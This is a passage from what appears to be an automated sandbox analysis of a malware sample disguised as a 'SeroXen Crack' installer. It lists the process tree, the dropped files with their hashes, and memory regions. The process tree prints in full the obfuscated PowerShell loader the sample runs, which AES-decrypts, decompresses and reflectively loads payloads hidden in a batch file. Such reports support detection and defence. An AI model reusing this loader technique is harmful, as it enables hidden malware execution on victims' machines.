                                                  PID:1760
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1836
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1840
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1856
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1896
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1948
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2032
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:1708
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2156
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2356
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2364
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                        PID:2444
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2472
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                          • Checks processor information in registry
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2488
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2500
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2508
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                              1⤵
                                                                                PID:2596
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2884
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:1712
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2456
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3320
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3408
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat"
                                                                                            2⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3976
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              3⤵
                                                                                                PID:2904
                                                                                              • C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat.exe
                                                                                                "SeroXen-install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                3⤵
                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Drops file in Windows directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2424
                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{6f796d34-12c7-41b6-b8c2-572aa9bd7d86}
                                                                                                  4⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:868
                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                              "C:\Windows\system32\taskmgr.exe" /4
                                                                                              2⤵
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:4344
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3536
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3748
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3932
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3900
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                    1⤵
                                                                                                      PID:1880
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                      1⤵
                                                                                                        PID:4788
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                          PID:872
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                          1⤵
                                                                                                            PID:640
                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                            1⤵
                                                                                                              PID:4980
                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:3196
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                1⤵
                                                                                                                  PID:3136
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                  1⤵
                                                                                                                    PID:2132
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                    1⤵
                                                                                                                      PID:3176
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:4720
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                        • Modifies registry class
                                                                                                                        PID:1440
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:4284
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                          1⤵
                                                                                                                            PID:4484
                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            1⤵
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Enumerates system info in registry
                                                                                                                            PID:4472
                                                                                                                          • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                            C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                            1⤵
                                                                                                                              PID:3304
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                              1⤵
                                                                                                                                PID:3560
                                                                                                                              • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4456

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat.exe
                                                                                                                                  Filesize

                                                                                                                                  442KB

                                                                                                                                  MD5

                                                                                                                                  04029e121a0cfa5991749937dd22a1d9

                                                                                                                                  SHA1

                                                                                                                                  f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                  SHA256

                                                                                                                                  9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                  SHA512

                                                                                                                                  6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                  Download Submit

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p2s2ttob.po0.ps1
                                                                                                                                  Filesize

                                                                                                                                  60B

                                                                                                                                  MD5

                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                  SHA1

                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                  SHA256

                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                  SHA512

                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                  Download Submit

                                                                                                                                • C:\Windows\$sxr-cmd.exe
                                                                                                                                  Filesize

                                                                                                                                  283KB

                                                                                                                                  MD5

                                                                                                                                  8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                                  SHA1

                                                                                                                                  f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                                  SHA256

                                                                                                                                  b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                                  SHA512

                                                                                                                                  99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                                  Download Submit

                                                                                                                                • C:\Windows\$sxr-mshta.exe
                                                                                                                                  Filesize

                                                                                                                                  14KB

                                                                                                                                  MD5

                                                                                                                                  0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                                  SHA1

                                                                                                                                  51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                                  SHA256

                                                                                                                                  dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                                  SHA512

                                                                                                                                  d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                                  Download Submit

                                                                                                                                • memory/336-121-0x00000131ADCB0000-0x00000131ADCD7000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  156KB

                                                                                                                                  Download

                                                                                                                                • memory/336-122-0x00007FFF55DF0000-0x00007FFF55E00000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                  Download

                                                                                                                                • memory/436-129-0x00007FFF55DF0000-0x00007FFF55E00000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                  Download

                                                                                                                                • memory/436-128-0x0000023492A90000-0x0000023492AB7000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  156KB

                                                                                                                                  Download

                                                                                                                                • memory/616-115-0x00007FFF55DF0000-0x00007FFF55E00000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                  Download

                                                                                                                                • memory/616-111-0x000001F584400000-0x000001F584422000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  136KB

                                                                                                                                  Download

                                                                                                                                • memory/616-112-0x000001F584430000-0x000001F584457000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  156KB

                                                                                                                                  Download

                                                                                                                                • memory/672-117-0x00007FFF55DF0000-0x00007FFF55E00000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                  Download

                                                                                                                                • memory/672-114-0x000002C2DFB70000-0x000002C2DFB97000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  156KB

                                                                                                                                  Download

                                                                                                                                • memory/692-135-0x0000024684BB0000-0x0000024684BD7000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  156KB

                                                                                                                                  Download

                                                                                                                                • memory/692-136-0x00007FFF55DF0000-0x00007FFF55E00000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                  Download

                                                                                                                                • memory/868-36-0x0000000000400000-0x0000000000406000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  24KB

                                                                                                                                  Download

                                                                                                                                • memory/868-34-0x0000000000400000-0x0000000000406000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  24KB

                                                                                                                                  Download

                                                                                                                                • memory/956-126-0x00007FFF55DF0000-0x00007FFF55E00000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                  Download

                                                                                                                                • memory/956-125-0x000002003D7B0000-0x000002003D7D7000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  156KB

                                                                                                                                  Download

                                                                                                                                • memory/1044-138-0x0000016087890000-0x00000160878B7000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  156KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-33-0x00007FFF758A3000-0x00007FFF758A5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-24-0x000001BC1D160000-0x000001BC1D1B6000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  344KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-37-0x00007FFF758A0000-0x00007FFF76361000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                  Download

                                                                                                                                • memory/2424-4-0x00007FFF758A3000-0x00007FFF758A5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-14-0x000001BC1CEB0000-0x000001BC1CED2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  136KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-15-0x00007FFF758A0000-0x00007FFF76361000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                  Download

                                                                                                                                • memory/2424-16-0x00007FFF758A0000-0x00007FFF76361000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                  Download

                                                                                                                                • memory/2424-17-0x000001BC1CC70000-0x000001BC1CC94000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  144KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-18-0x00007FFF95D70000-0x00007FFF95F65000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                  Download

                                                                                                                                • memory/2424-19-0x00007FFF94CE0000-0x00007FFF94D9E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-20-0x000001BC1D8F0000-0x000001BC1E340000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.3MB

                                                                                                                                  Download

                                                                                                                                • memory/2424-22-0x00007FFF758A0000-0x00007FFF76361000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                  Download

                                                                                                                                • memory/2424-23-0x000001BC1E340000-0x000001BC1E3E6000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  664KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-25-0x000001BC1E3F0000-0x000001BC1E448000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  352KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-27-0x00007FFF95D70000-0x00007FFF95F65000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                  Download

                                                                                                                                • memory/2424-26-0x000001BC1CC90000-0x000001BC1CCB2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  136KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-29-0x000001BC1CCB0000-0x000001BC1CCBA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  40KB

                                                                                                                                  Download

                                                                                                                                • memory/2424-90-0x00007FFF758A0000-0x00007FFF76361000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                  Download

                                                                                                                                • memory/2604-77-0x000001F8DFA30000-0x000001F8E01FA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  7.8MB

                                                                                                                                  Download

                                                                                                                                • memory/2604-78-0x000001F8E0200000-0x000001F8E063E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4.2MB

                                                                                                                                  Download

                                                                                                                                • memory/2604-79-0x000001F8E0640000-0x000001F8E06F2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  712KB

                                                                                                                                  Download

                                                                                                                                • memory/2604-80-0x00007FFF95D70000-0x00007FFF95F65000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                  Download

                                                                                                                                • memory/2604-87-0x000001F8D7F20000-0x000001F8D7F70000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  320KB

                                                                                                                                  Download

                                                                                                                                • memory/2604-88-0x000001F8D8030000-0x000001F8D80E2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  712KB

                                                                                                                                  Download

                                                                                                                                • memory/2604-89-0x000001F8D82C0000-0x000001F8D8482000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  1.8MB

                                                                                                                                  Download

                                                                                                                                • memory/2604-76-0x000001F8D6FD0000-0x000001F8D7554000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  5.5MB

                                                                                                                                  Download

                                                                                                                                • memory/2604-100-0x000001F8D7F70000-0x000001F8D7FAC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  240KB

                                                                                                                                  Download

                                                                                                                                • memory/2604-101-0x000001F8D7ED0000-0x000001F8D7F1E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  312KB

                                                                                                                                  Download

                                                                                                                                • memory/2604-103-0x00007FFF94CE0000-0x00007FFF94D9E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                  Download

                                                                                                                                • memory/2604-102-0x00007FFF95D70000-0x00007FFF95F65000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                  Download

                                                                                                                                • memory/2604-104-0x000001F8D7FB0000-0x000001F8D7FE6000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  216KB

                                                                                                                                  Download

                                                                                                                                • memory/2604-73-0x00007FFF95D70000-0x00007FFF95F65000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                  Download

                                                                                                                                • memory/2604-74-0x00007FFF94CE0000-0x00007FFF94D9E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                  Download

                                                                                                                                • memory/3496-106-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  160KB

                                                                                                                                  Download

                                                                                                                                • memory/3496-108-0x00007FFF94CE0000-0x00007FFF94D9E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                  Download

                                                                                                                                • memory/3496-107-0x00007FFF95D70000-0x00007FFF95F65000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                  Download

                                                                                                                                • memory/3496-105-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  160KB

                                                                                                                                  Download

                                                                                                                                • memory/3496-109-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  160KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-39-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-50-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-51-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-52-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-53-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-54-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-55-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-56-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-40-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4344-38-0x00000218203F0000-0x00000218203F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  Download

                                                                                                                                • memory/4856-30-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  16KB

                                                                                                                                  Download

                                                                                                                                • memory/4856-32-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  16KB

                                                                                                                                  Download